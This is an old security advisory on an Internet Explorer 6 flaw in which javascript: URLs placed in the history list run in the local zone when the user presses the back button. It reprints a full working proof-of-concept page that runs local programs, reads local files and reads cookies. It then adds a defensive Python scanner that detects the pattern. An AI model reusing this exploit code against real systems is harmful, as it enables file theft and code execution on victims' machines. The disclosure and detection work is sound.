26th Sep 2002 [SBWID-5274]
COMMAND
	IE back button can cause execution of script from history URLs
SYSTEMS AFFECTED
	IE 6.0 at least
PROBLEM
	From Andreas Sandblad's [[email protected]] post:
	IE allows URLs containing the javascript protocol in the history list.
	Code injected in the URL will operate in the same zone/domain as the
	last URL viewed. The javascript URL can be set to trigger when a user
	presses the back button.
	The normal behaviour when a page fails to load is to press the
	back button. The error page shown by IE is operating in the local
	computer zone (res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on
	Win2000). Thus, we can execute code and read local files.
	 EXPLOIT
	 =======
	The exploit works as follows: Press one of the links and then the back
	button.
	Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
	and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
	test.txt must exist.
	--------------------------CUT HERE-------------------------------
	 
	<html>
	<h1>Press link and then the backbutton to trigger script.</h1>
	<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
	Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
	<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
	Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
	<a href="javascript:readFile('file:///c:/test.txt')">
	Read c:\test.txt (needs to be created)</a><br>
	<a href="javascript:readCookie('http://www.google.com/')">
	Read Google cookie</a>
	<script>
	// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
	badUrl = "res:";
	function execFile(file){
	  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
	  s+= 'CODEBASE='+file+'></OBJECT>';
	  backBug(badUrl,s);
	}
	function readFile(file){
	  s = '<iframe name=i src='+file+' style=display:none onload=';
	  s+= 'alert(i.document.body.innerText)></iframe>';
	  backBug(badUrl,s);
	}
	function readCookie(url){
	  s = '<script>alert(document.cookie);close();<"+"/script>';
	  backBug(url,s);
	}
	function backBug(url,payload){
	  len = history.length;
	  page = document.location;
	  s = "javascript:if (history.length!="+len+") {";
	  s+= "open('javascript:document.write(\""+payload+"\")')";
	  s+= ";history.back();} else '<script>location=\""+url
	  s+= "\";document.title=\""+page+"\";<"+"/script>';";
	  location = s;
	}
	</script>
	</html>
	
	--------------------------CUT HERE-------------------------------
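	Added example (not part of the advisory or Sandblad's post): a content
	scanner, written here for defenders, that flags HTML carrying the pattern
	the advisory describes. It is an assumption of this example that a proxy,
	mail gateway or web archive would run it over page bodies; the signals it
	combines are taken from the description above: a script that builds a
	string literal starting with "javascript:", assigns it to location (so
	the URL lands in the history list) and keys off history.length or
	history.back(). The two sample pages below are constructed for the test
	and do not reproduce the advisory's file-reading payload.

```python
"""Flag HTML that plants a javascript: URL in the history and fires it on
the back button, the pattern described in SBWID-5274 (added example)."""

import re
from html.parser import HTMLParser

# Signals taken from the advisory's description of the technique.
JS_STRING = re.compile(r"""["']\s*javascript:""", re.IGNORECASE)      # string literal beginning with javascript:
HISTORY_REF = re.compile(r"history\.(?:back\s*\(|length\b)", re.IGNORECASE)
LOCATION_SET = re.compile(r"\blocation\s*=[^=]", re.IGNORECASE)       # assignment, not comparison
JS_HREF = re.compile(r"^\s*javascript:", re.IGNORECASE)

ORDER = {"clean": 0, "low": 1, "medium": 2, "high": 3}


class _Collector(HTMLParser):
    """Collects inline <script> bodies and javascript:-scheme href/src values."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.js_hrefs = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._buf = []
        for name, value in attrs:
            if name in ("href", "src") and value and JS_HREF.match(value):
                self.js_hrefs.append(value)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))

    def handle_data(self, data):
        # HTMLParser treats <script> content as raw text, so the body
        # arrives here (possibly in several chunks) until </script>.
        if self._in_script:
            self._buf.append(data)


def scan_html(html):
    """Return a list of (severity, reason) findings; an empty list means clean."""
    collector = _Collector()
    collector.feed(html)
    collector.close()
    findings = []
    for href in collector.js_hrefs:
        findings.append(("low", "javascript: scheme in link: " + href[:60]))
    for body in collector.scripts:
        has_js_url = bool(JS_STRING.search(body))
        has_history = bool(HISTORY_REF.search(body))
        sets_location = bool(LOCATION_SET.search(body))
        if has_js_url and sets_location and has_history:
            findings.append(("high", "script assigns a javascript: URL to location "
                                     "and keys off history.length/history.back()"))
        elif has_js_url and sets_location:
            findings.append(("medium", "script assigns a javascript: URL to location"))
    return findings


def max_severity(html):
    """Highest severity among the findings, or 'clean'."""
    return max((f[0] for f in scan_html(html)), key=ORDER.get, default="clean")


# Constructed sample: same structure as the advisory's backBug(), payload replaced.
SUSPECT_PAGE = """<html><body>
<a href="javascript:trigger()">click</a>
<script>
function trigger(){
  len = history.length;
  s = "javascript:if (history.length!=" + len + ") { alert('payload'); history.back(); }";
  location = s;
}
</script>
</body></html>"""

# Constructed sample: an ordinary page that uses history.back() legitimately.
BENIGN_PAGE = """<html><body>
<a href="/home">Home</a>
<button onclick="history.back()">Go back</button>
<script>
document.title = "Welcome";
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        print(name, max_severity(page), scan_html(page))
```

	The high-severity rule requires all three signals in one script so that
	an ordinary "go back" handler does not trip it; a page that merely
	assigns a javascript: URL to location is reported at medium for review.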
	
SOLUTION
	None yet.